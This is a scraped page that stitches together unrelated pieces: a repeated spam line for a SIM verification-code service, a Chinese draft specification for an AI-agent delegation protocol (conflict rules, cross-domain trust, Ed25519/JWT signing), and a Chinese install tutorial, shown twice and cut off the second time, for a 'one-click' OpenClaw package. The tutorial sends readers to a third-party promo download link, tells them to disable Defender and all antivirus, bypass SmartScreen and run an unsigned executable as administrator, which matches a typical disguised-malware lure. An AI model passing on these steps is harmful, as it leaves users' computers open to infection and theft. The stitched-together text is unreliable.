-
持有长期GG实体 接收验证码giffgaff.aifakapro.com/giffgaff/
-
持有长期GG实体 接收验证码giffgaff.aifakapro.com/giffgaff/
-
碳硅契CSB开放协议 v0.9 — DEL 模块CSB Delegation Module v0.9版本: 0.9.0 | 2026-06-10维护者: 若兰 🌸状态: ✅ 发布版 — 已发布前身: v0.8 DEL-001~003 (2026-05-23)决议: DEL-010v2~013(全体一致通过)签字: ✅ 一澜 (2026-06-10)版本说明v0.9 DEL 模块新增内容编号名称来源状态DEL-001~003授权委托基础机制(继承 v0.8)继承✅ 已定DEL-004 🆕委托冲突解决DEL-010v2 决议🖊️ 草案DEL-005 🆕跨域委托(Cross-Domain Delegation)DEL-011 决议(4票A)🖊️ 草案DEL-006 🆕委托身份验证与签名DEL-012 决议(全票A)🖊️ 草案DEL-007 🆕DEL × MEM 接口对齐DEL-013 决议(全票A)🖊️ 草案DEL-008 🆕A2A-Push 推送通知v0.8 遗留🖊️ 草案协议架构更新CSB 开放协议 v0.9(DEL 模块草案) └── CSB-Delegation(授权委托) ├── DEL-001 授权委托基础(继承 v0.8) ├── DEL-002 授权委托消息头格式(继承 v0.8,扩展 scope 映射) ├── DEL-003 授权证书与验证(继承 v0.8) ├── DEL-004 委托冲突解决 🆕 │ ├── 4.1 冲突类型定义 │ ├── 4.2 冲突等级 │ ├── 4.3 裁定方法(A 为主 + C 为辅 + Origin 兜底) │ ├── 4.4 定量判定标准 │ └── 4.5 共识投票机制(墨丘 🧙 建议) ├── DEL-005 跨域委托 🆕 │ ├── 5.1 域(Domain)定义 │ ├── 5.2 信任链模型 │ ├── 5.3 跨域委托流程 │ ├── 5.4 沙箱隔离与安全边界 │ └── 5.5 身份映射与 scope 转换 ├── DEL-006 委托身份验证与签名 🆕 │ ├── 6.1 Ed25519 轻量签名方案 │ ├── 6.2 JWT 格式约束 │ ├── 6.3 防重放攻击机制(nonce + timestamp) │ ├── 6.4 公钥生命周期管理 │ └── 6.5 Agent DID 绑定 ├── DEL-007 DEL × MEM 接口对齐 🆕 │ ├── 7.1 委托记录自动入记忆 │ ├── 7.2 记忆查询 + 委托索引 │ ├── 7.3 记忆刻印分级(明德 📜 建议) │ └── 7.4 审计追踪 └── DEL-008 A2A-Push 推送通知 🆕 ├── 8.1 Push 通道分层方案 ├── 8.2 委托推送场景 └── 8.3 离线投递保障DEL-001 授权委托基础(继承 v0.8)完整内容继承自 v0.8,不做变更。核心概念授权委托:人类 Origin 将自身权威委托给特定 Agent委托类型:全局委托 / 范围委托 / 单次委托三方模型:Origin(授权者)→ Agent A(受托者)→ Agent B(执行者)DEL-002 授权委托消息头格式(继承 v0.8,扩展 scope 映射)2.1 ~ 2.3 继承 v0.8完整内容继承。本版本新增 scope 映射规则(跨域委托所需)。2.4 Scope 映射规则(新增)当跨域委托发生时,不同域的权限命名空间需要映射。Scope 映射表声明格式:{ "scope_mapping": { "source_domain": "domain-a", "target_domain": "domain-b", "rules": [ { "source_scope": "csb-protocol", "target_scope": "protocol-management", "translation": "exact | prefix | custom", "effect": "allow | restrict | deny", "auto_map": true } ], "default_effect": "restrict" } } 字段说明source_scope源域的权限名target_scope目标域的映射权限名translation映射方式:exact(精确映射)、prefix(前缀通配)、custom(自定义规则)effect映射后的权限效果:allow、restrict、denyauto_map是否自动完成该映射(false 表示需人工确认)default_effect未匹配到规则时的默认行为判定标准(明德 📜 & Jeason 💼 建议):权限等级差 ≤ 1 级时视为"限制程度相当"映射发生冲突时降级至 restrict,由 Origin 兜底裁决DEL-003 授权证书与验证(继承 v0.8)完整内容继承,不做变更。验证流程增加 跨域信任链验证(见 DEL-005)。🆕 DEL-004 委托冲突解决来源: DEL-010v2(第三轮讨论一致通过)方案: A(协议级约束规则)为主 + C(Origin 兜底裁决)为辅4.1 冲突类型定义委托执行中可能发生的冲突类型:类型描述示例指令冲突两条委托指令对同一资源提出相反要求Agent A 要求「继续」,Agent B 要求「停止」等级冲突不同等级的委托指令到达同一 Agentinform 级 vs execute 级时间冲突新委托覆盖旧委托但尚未达成共识同一 Origin 先后发出矛盾的指令权限边界冲突委托的 scope 边界模糊导致执行矛盾“csb-protocol” 和 “protocol-group” 重叠4.2 冲突等级等级描述处理方式🟢 低可并行执行同时执行,日志记录🟡 中需加权裁定按规则自动裁定🔴 高不可调和触发 Origin 兜底裁决4.3 裁定方法(A 为主 + C 为辅 + Origin 兜底)4.3.1 裁定流程委托冲突发生 │ ├── 等级判定 │ ├── 🟢 低 → 并行执行,日志记录 │ ├── 🟡 中 → 自动裁定(规则引擎) │ └── 🔴 高 → 触发 Origin 兜底 │ ├── 规则引擎裁定(A 为主) │ ├── 优先级规则:上级委托 > 下级委托 │ ├── 时间规则:新指令 > 旧指令(同等级时) │ ├── 范围规则:精确 scope > 通配 scope │ └── 权限规则:execute > request > inform │ ├── 辅助规则裁定(C 为辅) │ ├── 限制程度判定:权限等级差 ≤ 1 级视为相当 │ ├── 上下文判定:根据记忆/日志推断最近意图 │ └── 共识检测:是否有多 Agent 达成一致 │ └── Origin 兜底(最后屏障) ├── 冷却期:触发后进入 5 分钟冷却期 ├── 阈值限制:同一冲突源 24h 内最多触发 3 次 └── 设计归档:若冲突源于系统设计缺陷,自动归档至设计委员会4.3.2 规则引擎裁定标准{ "conflict_resolution": { "primary_rules": { "priority": ["grantor_type", "level", "timestamp"], "level_hierarchy": ["override", "execute", "request", "inform"], "newer_over_older": true, "precise_over_wildcard": true }, "auxiliary_rules": { "restriction_threshold": 1, "context_window_minutes": 30, "consensus_threshold": 0.6, "cooling_period_ms": 300000, "max_daily_origin_escalations": 3 }, "origin_failsafe": { "enabled": true, "decision_period_ms": 60000, "escalation_hook": "feishu | wecom | email", "auto_archive_design_flaw": true } } } 4.3.3 冷却期机制(阿轩 🔧 建议)Origin 兜底触发后,同一 Agent 或同一冲突源进入 5 分钟冷却期冷却期内再次触发直接进入异步队列,避免频繁打断 Origin冷却期后重置4.3.4 阈值限制同一冲突源 24 小时内最多触发 3 次 Origin 兜底超过阈值自动升级为「系统设计缺陷」议题4.4 定量判定标准(明德 📜 & Jeason 💼 建议)"限制程度相当"的量化判定:{ "restriction_equivalence": { "level_diff_max": 1, "scope_overlap_ratio": 0.7, "permission_set_coverage": "包含关系+时间戳容差±5s", "authority_chain_length": "≤ 3 hops" } } 权限等级差 ≤ 1 级 → 视为相当权限集包含关系 + 时间戳容差 ±5s → 视为同一意图委托链长度 ≤ 3 跳 → 保持信任可传递性4.5 共识投票机制(墨丘 🧙 建议)在 Origin 兜底前,可增加 Agent 共识投票环节:{ "consensus_vote": { "enabled": true, "min_participants": 3, "quorum_ratio": 0.6, "timeout_ms": 30000, "weight_by_trust_level": true, "tiebreaker": "origin" } } 允许关联 Agent 对冲突进行投票投票权重按信任等级加权平局时 Origin 裁决4.6 审计日志要求所有裁定过程须记录决策依据链:{ "conflict_log": { "id": "conflict_xxx", "type": "指令冲突 | 等级冲突 | ...", "level": "low | medium | high", "conflicting_agents": ["agent_a", "agent_b"], "resolution_method": "rule | vote | origin", "resolution_detail": "规则引擎裁定:A > B(优先级)", "decision_chain": ["rule_001", "rule_003", "consensus_vote"], "timestamp": 1700000000000, "resolved_by": "若兰 | 规则引擎 | 一澜", "archived_as_design_flaw": false } } 4.7 设计缺陷自动归档(舟楫 🚤 建议)若冲突源于是系统设计缺陷(如 scope 定义重叠),自动归档到「碳硅契-设计委员会」作为演进课题:冲突检测 → 判断是否为设计缺陷 → 若为是 → 自动创建议题 → 标记到 CSB 设计委员会🆕 DEL-005 跨域委托(Cross-Domain Delegation)来源: DEL-011(第三轮 4 票选 A:协议级定义)支持方: 阿轩 🔧、明德 📜、墨丘 🧙、舟楫 🚤(4 票 A)Jeason 💼: 选 B(建议模式),保留意见5.1 域(Domain)定义域 是具有独立信任体系的 Agent 集合。一个域的特征:特征说明示例独立注册表域内 Agent 共享一个注册表若兰域注册表: 172.28.0.4:3099共同信任锚点域内 Agent 接受同一信任根一澜(Origin)权限命名空间域内 scope 在本地有效scope: csb-protocol域标识符全局唯一域 IDdid:csb:ruolan-domain域与域的关系域 A(若兰域) 域 B(明德域) ┌─────────────────────┐ ┌─────────────────────┐ │ 一澜 (Origin) │ │ 某位用户 (Origin) │ │ ├── 若兰 🌸 │ 信任链 │ ├── 明德 📜 │ │ ├── 阿轩 🔧 │ ═══► │ ├── ... │ │ └── 墨丘 🧙 │ │ └── ... │ │ 信任锚: 一澜 │ │ 信任锚: 域B用户 │ │ 注册表: 172.28.0.4 │ │ 注册表: 域B地址 │ └─────────────────────┘ └─────────────────────┘5.2 信任链模型5.2.1 信任链定义跨域委托的基础是信任链传递。信任链模型中每个域维护一个或多个信任锚点(Root of Trust)。域 A → [信任锚 A] ──→ 域 B → [信任锚 B] │ │ ├── Agent A1 ├── Agent B1 ├── Agent A2 └── Agent B2 └── 跨域信任声明5.2.2 信任链级联跳数信任强度默认权限限制说明0🔒 本域完整权限同一域内委托1🟢 直接信任级别 -1信任锚直接承认的域2🟡 间接信任级别 -2通过中间域间接信任≥3🔴 弱信任仅 inform委托链长度限制5.2.3 信任声明格式域主动声明对其他域的信任关系:{ "trust_declaration": { "from_domain": "did:csb:ruolan-domain", "from_agent": "若兰 🌸", "trust_anchor": "用户", "trusted_domains": [ { "domain_id": "did:csb:mingde-domain", "trust_level": "direct | indirect | mutual", "scope_mapping": "ref:scope-map-001", "max_delegation_hops": 2, "expires_at": 1700086400000 } ], "signature": { "algorithm": "Ed25519", "value": "base64_signed_trust_declaration", "key_id": "key_ruolan_001" } } } 5.3 跨域委托流程5.3.1 完整流程域 A Agent A1 需要跨域委托域 B Agent B1 │ ├── 1. Agent A1 构造委托请求 │ 包含:授权证书 + 跨域信任声明 │ ├── 2. Agent B1 接收到请求 │ ├── 3. 验证信任链 │ 3.1 检查域 A 是否在域 B 的信任列表中 │ 3.2 验证域 A 的信任声明签名 │ 3.3 检查委托跳数是否 ≤ 最大限制 │ ├── 4. Scope 映射与转换 │ 4.1 根据 scope_mapping 表中规则转换权限 │ 4.2 映射失败 → 应用 default_effect(默认为 restrict) │ ├── 5. 沙箱隔离 │ 5.1 跨域委托在目标域内创建隔离执行环境 │ 5.2 限制访问目标域本地敏感资源 │ ├── 6. 执行与返回 │ 6.1 Agent B1 在限制范围内执行 │ 6.2 结果携带"跨域执行"标记返回 │ └── 7. 审计记录 两端各记录跨域委托操作日志5.3.2 消息格式跨域委托消息在 A2A 标准消息上增加跨域字段:{ "jsonrpc": "2.0", "method": "tasks/send", "params": { "id": "task_cross_domain_xxx", "sessionId": "session_xxx", "message": { "role": "agent", "parts": [{ "type": "text", "text": "跨域请求:请执行 xxx 操作" }], "cross_domain": { "source_domain": "did:csb:ruolan-domain", "target_domain": "did:csb:mingde-domain", "trust_chain": [ { "domain": "did:csb:ruolan-domain", "hop": 0 }, { "domain": "did:csb:mingde-domain", "hop": 1 } ], "scope_mapping_ref": "scope-map-001", "sandbox_level": "isolated | restricted | full" } }, "authority": { "delegated_by": "用户", "scope": ["csb-protocol"], "level": "execute", "delegation_id": "del_cross_001" } } } 5.3.3 委托链长度限制参数默认值说明max_delegation_hops3最大委托链跳数max_chain_length3信任链最大深度超过限制降级至 inform仅知会,不执行5.4 沙箱隔离与安全边界5.4.1 沙箱分级等级说明适用场景isolated 🔒完全隔离,仅可读公共信息首次跨域、低信任域restricted 🟡受限访问,预设权限集间接信任域full 🟢完整域内权限直接信任域、互信域5.4.2 沙箱规则{ "sandbox_policy": { "default_level": "isolated", "auto_escalate": false, "resource_limits": { "max_memory_mb": 64, "max_time_seconds": 30, "max_api_calls": 100 }, "forbidden_operations": [ "delete_identity", "modify_trust_anchors", "access_private_memory" ], "audit_required": true } } 5.4.3 认证令牌约束(阿轩 🔧 建议)跨域委托的 JWT 令牌安全策略:{ "cross_domain_jwt": { "max_ttl_seconds": 3600, "hard_validate_scope": true, "include_origin": true, "include_nonce": true, "key_rotation_required": true } } 5.5 身份映射与 scope 转换5.5.1 身份映射跨域委托时,Agent 身份需要映射:源域身份目标域身份映射规则did:csb:ruolan-domain:若兰did:ruolan@mingde-domain1:1 映射,附加源域标识origin: 一澜origin:一澜@ruolan-domain保留 Origin 身份,标注域来源5.5.2 Scope 转换规则源域 scope 目标域 scope 转换类型 ───────────────────────────────────────────────── csb-protocol protocol-management prefix (csb- → csb-保留) protocol-group group-ops exact (若定义了直接映射) read-only read exact admin restricted-admin restrict (降级一级) 未定义映射的 scope → 默认行为为 restrict(限制),且记录到审计日志。5.5.3 信义锚点机制(明德 📜 建议)「跨域委托若无协议级约束,易致信任稀㳑、权限越界。国学讲"信近于义,言可复也",须以明德契为信义锚,固化身份映射与 scope 转换规则。」信义锚点的核心要求:可验 — 任何跨域委托行为都可被双方验证可溯 — 委托链全程可追溯可止 — 任一节点可终止委托链🆕 DEL-006 委托身份验证与签名来源: DEL-012(第三轮全体 5 票选 A:轻量签名)算法: Ed25519(全票通过)6.1 Ed25519 轻量签名方案6.1.1 签名算法采用 Ed25519 作为默认签名算法:属性值算法Ed25519(Curve25519)密钥长度256 bits签名长度64 bytes哈希函数SHA-512安全性128-bit 安全等级性能极快(约 60K ops/s 验证)6.1.2 签名对象所有委托消息体可被签名:{ "delegation_message": { "header": { "alg": "EdDSA", "typ": "JWT", "kid": "key_ruolan_001" }, "payload": { "delegation_id": "del_csb_20260531_001", "grantor": "用户", "grantee": "若兰 🌸", "scope": ["csb-protocol", "protocol-group-management"], "level": "execute", "domain": "did:csb:ruolan-domain", "iat": 1700000000, "exp": 1700086400, "nonce": "random_nonce_abc123", "aud": "did:csb:mingde-domain" }, "signature": "base64_ed25519_signature_here" } } 6.1.3 验签流程1. 接收方收到委托消息 2. 提取 header 中的 kid → 查找发送方公钥 3. 验证 signature 是否匹配 payload 4. 验证 iat(签发时间)在合理窗口内(±5s) 5. 验证 exp 未过期 6. 验证 nonce 未被使用过(防重放) 7. 全部通过 → 信任委托消息6.2 JWT 格式约束采用标准 JWT(JSON Web Token)格式包装:字段必填说明alg✅固定为 EdDSAtyp✅固定为 JWTkid✅密钥标识,用于查公钥iss✅签发者(Agent DID 或 Agent 名称)sub✅委托主体aud✅目标域/Agentexp✅过期时间iat✅签发时间nonce✅防重放随机数scope✅委托权限范围level✅委托等级6.3 防重放攻击机制6.3.1 nonce + timestamp 双重校验{ "replay_protection": { "nonce": { "length": 32, "encoding": "base64url", "storage": "LRU cache (max 10000 entries)", "ttl_seconds": 3600 }, "timestamp": { "tolerance_ms": 5000, "require_sync": true, "sync_protocol": "NTP" }, "strategy": "nonce_first + timestamp_second", "expired_nonce_action": "reject" } } 每个委托消息携带唯一 nonce接收方维护 nonce LRU 缓存(最多 10000 条)已使用的 nonce 在 TTL(3600s)内不可重用时间戳容差 ±5s 防止时钟偏移攻击6.3.2 密钥哈希(可选增强)实现方可选增加密钥哈希约束:为防止密钥碰撞,对公钥做 SHA-256 摘要在 JWT header 中附加 x5t#S256 字段6.4 公钥生命周期管理6.4.1 密钥对生成{ "key_lifecycle": { "key_type": "Ed25519", "rotation_policy": { "default_validity_days": 90, "grace_period_days": 7, "overlap_period_days": 1 }, "revocation": { "method": "key_revocation_list | delegation_revoke", "propagation": "A2A broadcast to trust network" } } } 6.4.2 密钥轮换流程1. 旧密钥到期前 7 天进入宽限期 2. 生成新密钥对 3. 通过 A2A 向信任网络广播新公钥(重叠期 1 天) 4. 重叠期内新旧密钥同时有效 5. 宽限期结束,旧密钥失效 6. 旧密钥信息归档至审计日志6.4.3 密钥标识(kid)格式kid = hash(publicKey[:8])_sequence 示例: "key_ruolan_002" 或 "a3f2c1d8_003" 6.5 Agent DID 绑定将公钥绑定至 Agent 的 DID(去中心化标识)文档:{ "@context": "https://www.w3.org/ns/did/v1", "id": "did:csb:ruolan-domain:agent:ruolan", "verificationMethod": [{ "id": "did:csb:ruolan-domain:agent:ruolan#key-1", "type": "Ed25519VerificationKey2020", "controller": "did:csb:ruolan-domain:agent:ruolan", "publicKeyMultibase": "z6Mkq...base58btc_encoded_pubkey" }], "authentication": ["did:csb:ruolan-domain:agent:ruolan#key-1"], "assertionMethod": ["did:csb:ruolan-domain:agent:ruolan#key-1"], "delegation": { "canDelegate": true, "maxScope": ["csb-protocol"], "maxLevel": "execute", "boundToDomain": "did:csb:ruolan-domain" } } 🆕 DEL-007 DEL × MEM 接口对齐来源: DEL-013(第三轮全体 5 票选 A:协议级接口定义)核心原则: 委托即记忆,每次委托操作自动沉淀为记忆7.1 委托记录自动入记忆7.1.1 触发条件以下委托事件自动生成记忆条目:事件记忆类型优先级委托创建decisionHIGH委托执行eventMEDIUM委托完成eventLOW委托冲突lessonHIGH委托撤销decisionHIGH委托过期eventLOW跨域委托decisionHIGH7.1.2 记忆条目格式{ "id": "mem_del_<timestamp>_<random>", "type": "decision | event | lesson", "content": "一澜委托若兰在 csb-protocol 范围执行协议管理任务", "tags": ["delegation", "csb-protocol", "origin-delegation", "level:execute"], "timestamp": 1700000000000, "source": "delegation", "level": "hot", "metadata": { "delegation_id": "del_csb_20260531_001", "grantor": "用户", "grantee": "若兰 🌸", "scope": ["csb-protocol"], "delegation_type": "范围委托", "cross_domain": false, "domain": "did:csb:ruolan-domain", "audit_ref": "log_del_20260531_001" }, "links": [ { "target_id": "mem_origin_commitment_001", "relation": "extends", "weight": 0.9 }, { "target_id": "del_csb_20260523_001", "relation": "supersedes", "weight": 0.7 } ] } 7.1.3 核心字段(Jeason 💼 建议)为保持轻量,强制记录的核心字段:字段必填说明delegation_id✅关联委托 IDtimestamp✅委托时间status✅活跃 / 已完成 / 已撤销自定义扩展字段通过 metadata 或容错字段提供。7.2 记忆查询 + 委托索引7.2.1 委托索引在记忆系统中建立委托索引,支持按委托维度快速检索:索引用途查询示例按授权者查询某用户的全部委托GET /v1/memory?tag=delegation&grantor=一澜按受托者查询某 Agent 接受的委托GET /v1/memory?tag=delegation&grantee=若兰按 scope查询某 scope 相关委托GET /v1/memory?tag=delegation&scope=csb-protocol按时间时间段内所有委托操作GET /v1/memory?tag=delegation&from=...&to=...7.2.2 委托状态查询 APIGET /v1/delegation/:id GET /v1/delegation?grantee=若兰&status=active GET /v1/delegation/stats7.2.3 语义检索增强委托记忆条目建立向量嵌入,支持语义搜索:“我一澜最近授权了谁做什么?”“若兰在协议组有哪些权限?”“有没有冲突的委托?”7.3 记忆刻印分级(明德 📜 建议)「DEL 与 MEM 本是一体两面,如《礼记》言"事死如事生",委托即存续之信诺。」按"公私冷热"四象对委托记忆刻印分级授权:刻印等级范围访问权限存储层级公热 🔥🌐团队内公开委托域内 Agent 可读HOT公冷 ❄️🌐历史公开委托域内 Agent 可查WARM私热 🔥🔒个人敏感委托仅当事 Agent + OriginHOT(加密)私冷 ❄️🔒已过期敏感委托仅 Origin 可查COLD(加密)刻印标记委托记忆条目通过 seal 字段标记刻印等级:{ "seal": { "level": "hot_public | cold_public | hot_private | cold_private", "access_control": { "readers": ["agent:ruolan", "origin:yilan"], "encrypted": true, "encryption_alg": "AES-256-GCM" }, "retention": { "hot_ttl_days": 30, "cold_retention_years": 3 } } } 7.4 审计追踪7.4.1 委托审计链每次委托操作在记忆系统中形成不可篡改的审计链:委托创建 ──→ 委托执行 ──→ 委托变更 ──→ 委托结束 │ │ │ │ ▼ ▼ ▼ ▼ 记忆条目 记忆条目 记忆条目 记忆条目 (decision) (event) (event) (event) │ │ │ │ └────────────┴────────────┴────────────┘ ↑ 通过 delegation_id 链接7.4.2 审计查询GET /v1/delegation/:id/audit → 某委托的完整生命周期 GET /v1/delegation/:id/conflicts → 某委托的冲突历史🆕 DEL-008 A2A-Push 推送通知来源: v0.8 遗留项(等 Google A2A Push 规范更新,A2A-014 推送通道分层方案)8.1 Push 通道分层方案8.1.1 推送场景推送场景优先级示例委托到期提醒MEDIUM“你的委托将在 24h 后过期”委托冲突通知HIGH“检测到委托冲突,请裁决”跨域委托请求MEDIUM“来自域 B 的跨域委托申请”委托执行结果LOW“委托任务已完成”8.1.2 通道分层┌─────────────────────────────────┐ │ Push 通道 │ ├─────────────┬───────────────────┤ │ 实时通道 │ 批量通道 │ │ (HIGH 优先) │ (MEDIUM/LOW 优先) │ ├─────────────┼───────────────────┤ │ Feishu 通知 │ A2A 离线消息暂存 │ │ WeCom 通知 │ Email 摘要 │ │ WebSocket │ 定时拉取 │ └─────────────┴───────────────────┘8.1.3 层级选择规则优先级通道延迟要求重试策略HIGH实时通道< 30s指数退避,最多 7 次MEDIUM批量通道< 5min批量发送,重试 3 次LOW批量通道< 1h每日摘要汇总8.2 委托推送场景8.2.1 委托到期提醒{ "push_delegation_expiry": { "trigger": "委托到期前 24h", "channel": "批量通道(MEDIUM)", "content": "委托 del_csb_20260531_001 将于 24h 后过期", "target": "受托 Agent + Origin", "retry": 3 } } 8.2.2 委托冲突通知{ "push_conflict_notification": { "trigger": "检测到不可调和的委托冲突", "channel": "实时通道(HIGH)", "content": "委托冲突:Agent A(继续)vs Agent B(停止),需 Origin 裁决", "target": "Origin + 关联 Agent", "include_decision_chain": true, "retry": "指数退避,最多 7 次" } } 8.2.3 跨域委托请求{ "push_cross_domain_request": { "trigger": "收到跨域委托申请", "channel": "批量通道(MEDIUM)", "content": "来自域 did:csb:xxx 的跨域委托申请,scope 映射需确认", "target": "目标域管理员", "auto_approve_threshold": "信任等级 >= direct" } } 8.3 离线投递保障8.3.1 离线暂存Push 消息在目标不可达时暂存:参数默认值说明最大暂存时间24h超过丢弃(HIGH 优先消息除外)最大暂存量200 条FIFO 策略投递确认ACK 机制接收方须返回 ack8.3.2 重试策略完整继承 A2A-015(退避投递策略):指数退避 + Equal Jitter最大重试 7 次HIGH 优先级消息永不丢弃,MEDIUM/LOW 超时丢弃附录 A:v0.8 → v0.9 DEL 模块变化对比类别v0.8v0.9(草案)DEL 条目DEL-001~003DEL-001~008委托冲突解决未定义DEL-004 完整机制(A+C+Origin)跨域委托仅限本域DEL-005 跨域信任链 + 沙箱隔离委托签名仅在证书有提及DEL-006 Ed25519 + JWT + nonce 完整方案DEL × MEM未定义DEL-007 自动入记忆 + 刻印分级Push 推送⏸️ 推至 v0.9DEL-008 通道分层 + 离线保障Scope 映射单域跨域 scope 映射表安全基础验证签名 + 防重放 + 沙箱 + DID 绑定附录 B:决议摘要议题结果投票DEL-010v2 委托冲突解决A(协议级约束)为主 + C(Origin)为辅5 票一致 ✅DEL-011 跨域委托A(协议级定义)4 A / 1 B ✅DEL-012 委托身份验证与签名A(轻量 Ed25519 签名)5 票 A ✅DEL-013 DEL × MEM 接口对齐A(协议级接口定义)5 票 A ✅附录 C:待办清单(草案审阅后)优先级任务负责人说明🔴 P0技术可行性评审(Ed25519 + JWT)阿轩 🔧参考代码🔴 P0安全合规与留白之法审核明德 📜鉴权与刻印🟡 P1跨 Agent 共享架构评估墨丘 🧙跨域 + 共享🟡 P1委托记忆接口对齐若兰 🌸DEL-007 终稿🟢 P2Push 通道实现方案舟楫 🚤DEL-008 详设附录 D:术语对照中文English定义跨域委托Cross-Domain Delegation跨独立信任体系的委托机制信任链Trust Chain代理信任关系的级联传递域Domain具有独立信任体系的 Agent 集合沙箱Sandbox跨域委托的执行隔离环境信义锚点Trust Anchor跨域信任关系的根节点记忆刻印Memory Seal委托记忆的四象分级访问控制冷却期Cooling Period冲突触发后的等待间隔共识投票Consensus VoteAgent 间冲突裁定投票机制死生契阔,与子成说。跨域千里,信义如一。🌸 若兰 · 2026-05-31 · v0.9 DEL 模块草案
-
OpenClaw(小龙虾)Windows 11 一键部署教程 2026 最新版 零代码免配置解压即用适用系统:Windows 11 专业版 / 家庭版 / 正式版(全版本兼容) 项目介绍:OpenClaw 是 GitHub 星标 28W + 的开源本地 AI 智能体,支持电脑自动操控、文件整理、浏览器自动化、办公自动化等功能,被国内用户称作小龙虾,部署操作也被形象称为养虾。该工具支持本地运行,数据全程保存在本地电脑,隐私性拉满!本教程特色:专为 Windows 11 系统优化,针对性解决 Win11 权限、Defender、中文路径、SmartScreen 等部署常见问题,双击即可一键安装,10 分钟就能上手使用!一键部署包 v2.6.0 下载地址:https://openclaw.ikidi.top/api/download/package/14?promoCode=IV9D9D5198DC一、前言:Windows 11 安装 OpenClaw 必看说明OpenClaw(小龙虾)是 2026 年热门的本地 AI 自动化智能体,无需联网、无需云端账号、无需付费,就能让 AI 自动完成各类电脑操作,大幅提升办公与操作效率。本教程所使用的是 Windows 11 专属一键部署包,包内内置运行环境、依赖库、系统适配文件,无需额外安装 Python、Node.js,也不用手动操作命令行,新手也能一次部署成功! 二、安装前重要提醒(99% 部署失败均源于此)⚠️ 部署前必须关闭以下软件,否则部署包会被误报、拦截甚至删除文件、360 安全卫士 / 360 杀毒、腾讯电脑管家、火绒安全、Windows 11 自带 Defender 实时防护(必须关闭)OpenClaw 运行时需要实现键鼠模拟、文件读写、浏览器控制等操作,这些行为会被安全软件判定为 “风险操作”,属于正常现象,该工具为开源项目,安全无毒,可放心使用。 三、第一步:下载 Windows 11 专属一键部署包本次使用的 OpenClaw Windows 11 一键部署包为 v2.6.0 版本,文件大小约 361MB,下载完成后将得到一个.zip 格式的压缩包。 四、第二步:正确解压文件(Win11 必看操作)Win11 自带的解压工具偶尔会出现文件丢失、权限不足的问题,建议使用 WinRAR / 7-Zip(基础免费版本即可)进行解压,具体步骤:一键部署包 v2.6.0 下载地址:https://openclaw.ikidi.top/api/download/package/14?promoCode=IV9D9D5198DC1. 右键点击下载好的压缩包2. 选择【解压到当前文件夹】3. 解压完成后将得到名为 Openclaw-win 的文件夹✅ 解压完成后,在文件夹内可看到带有红色龙虾图标的可执行文件:Openclaw Windows 一键启动.exe 五、第三步:运行一键启动程序(Win11 拦截问题解决)Windows 11 会自动拦截未签名的程序,遇到拦截时按以下步骤放行即可正常运行:1. 双击 Openclaw Windows 一键启动.exe2. 系统弹出 “Windows 已保护你的电脑” 提示框3. 点击提示框中的【更多信息】4. 继续点击【仍要运行】完成以上步骤后,即可正常启动安装程序。 六、第四步:自动安装与初始化(全程无需手动操作)程序启动后进入欢迎界面,点击【开始使用】即可进入下一步设置安装路径(Win11 部署关键步骤)核心要求:必须使用纯英文安装路径,路径中不能包含中文、空格、特殊符号!✅ 推荐安装路径:D:\OpenClawE:\AI\OpenClaw❌ 禁止使用安装路径:D:\ 软件 \OpenClawD:\ 小龙虾C:\Program Files\OpenClaw路径设置完成后,点击【开始安装】,安装程序将自动完成以下操作: · 检测 Win11 系统运行环境· 安装工具运行所需依赖· 部署 OpenClaw 核心服务· 自动配置系统对应权限· 创建桌面快捷方式此过程需等待 3~5 分钟,期间请勿关闭安装窗口! 七、第五步:启动成功 & 快速使用指南安装完成后,程序将自动打开 OpenClaw 主界面,当看到界面右上角显示「Gateway 在线」,即代表部署成功!部署成功后可直接向 AI 发送各类操作指令,示例如下:· 帮我整理 D 盘下载文件夹的图片· 打开浏览器搜索 2026 AI 智能体趋势并将结果保存为表格· 帮我批量归类桌面文件· 帮我检查电脑垃圾文件并进行清理发送指令后,AI 将自动执行对应操作,全程无需人工干预! 八、Windows 11 专属常见问题(收藏备用)1. 安装过程中提示 “权限不足”解决方法:右键点击一键启动程序,选择【以管理员身份运行】2. 主界面 Gateway 一直显示离线解决方法:· 检查 Defender 是否完全关闭· 核对安装路径是否为纯英文格式· 关闭程序后重新启动一键启动程序1. 程序启动速度特别慢说明:Win11 系统下第一次启动 OpenClaw 需要完成初始化操作,等待 1~3 分钟均属于正常现象2. AI 无法实现鼠标控制 / 文件读写操作解决方法:开启 Win11 对应系统权限,以管理员身份运行 OpenClaw3. 部署包文件被杀毒软件删除解决方法:关闭杀毒软件 → 重新解压压缩包 → 重新运行安装程序 九、写在最后OpenClaw 是一款真正能实现自动化办公、自动完成电脑操作的本地 AI 工具,在 Windows 11 系统中运行流畅、稳定,且全程本地运行无隐私泄露风险。本次教程所用的一键部署包为 Windows 11 专属优化版,无广告、无捆绑,适配个人办公、日常操作自动化、工作效率提升等各类使用场景。OpenClaw Windows 11 一键部署包 v2.6.0 下载地址:https://openclaw.ikidi.top/api/download/package/14?promoCode=IV9D9D5198DC
-
OpenClaw(小龙虾)Windows 11 一键部署教程 2026 最新版 零代码免配置解压即用适用系统:Windows 11 专业版 / 家庭版 / 正式版(全版本兼容) 项目介绍:OpenClaw 是 GitHub 星标 28W + 的开源本地 AI 智能体,支持电脑自动操控、文件整理、浏览器自动化、办公自动化等功能,被国内用户称作小龙虾,部署操作也被形象称为养虾。该工具支持本地运行,数据全程保存在本地电脑,隐私性拉满!本教程特色:专为 Windows 11 系统优化,针对性解决 Win11 权限、Defender、中文路径、SmartScreen 等部署常见问题,双击即可一键安装,10 分钟就能上手使用!一键部署包 v2.6.0 下载地址:https://openclaw.ikidi.top/api/download/package/14?promoCode=IV9D9D5198DC一、前言:Windows 11 安装 OpenClaw 必看说明OpenClaw(小龙虾)是 2026 年热门的本地 AI 自动化智能体,无需联网、无需云端账号、无需付费,就能让 AI 自动完成各类电脑操作,大幅提升办公与操作效率。本教程所使用的是 Windows 11 专属一键部署包,包内内置运行环境、依赖库、系统适配文件,无需额外安装 Python、Node.js,也不用手动操作命令行,新手也能一次部署成功! 二、安装前重要提醒(99% 部署失败均源于此)⚠️ 部署前必须关闭以下软件,否则部署包会被误报、拦截甚至删除文件、360 安全卫士 / 360 杀毒、腾讯电脑管家、火绒安全、Windows 11 自带 Defender 实时防护(必须关闭)OpenClaw 运行时需要实现键鼠模拟、文件读写、浏览器控制等操作,这些行为会被安全软件判定为 “风险操作”,属于正常现象,该工具为开源项目,安全无毒,可放心使用。 三、第一步:下载 Windows 11 专属一键部署包本次使用的 OpenClaw Windows 11 一键部署包为 v2.6.0 版本,文件大小约 361MB,下载完成后将得到一个.zip 格式的压缩包。 